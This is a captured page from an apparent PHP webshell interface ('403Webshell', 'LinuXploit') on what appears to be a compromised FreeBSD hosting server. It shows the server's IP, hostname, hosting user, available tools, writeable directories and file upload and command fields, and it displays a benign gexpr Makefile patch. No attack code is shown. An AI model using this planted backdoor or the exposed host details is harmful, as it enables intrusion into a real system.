403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/math/gexpr/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/math/gexpr/files/patch-Makefile
--- ./Makefile.orig	1999-02-12 15:28:35.000000000 -0200
+++ ./Makefile	2014-02-16 15:38:19.000000000 -0300
@@ -1,11 +1,10 @@
 # Makefile for gexpr
 # Last updated: 10 February 1999
 
-CC	= gcc
-OPTS	= -s -O2 -Wall
+OPTS	= ${CFLAGS} ${CPPFLAGS}
 OBJS	= eval.o read_token.o commands.o output.o errors.o gexpr.o 
 GEXPR	= gexpr
-LIBS	= -lm
+LIBS	= -lm ${LDFLAGS}
 
 all: $(GEXPR)
 
@@ -31,8 +30,8 @@
 	$(CC) $(OPTS) -c gexpr.c
 
 install:
-	cp -f gexpr /usr/local/bin;
-	cp -f gexpr.1 /usr/local/man/man1
+	install -s gexpr ${DESTDIR}/usr/local/bin;
+	install gexpr.1 ${DESTDIR}/usr/local/man/man1
 	
 clean:
 	rm -f *.o core

Youez - 2016 - github.com/yon3zu
LinuXploit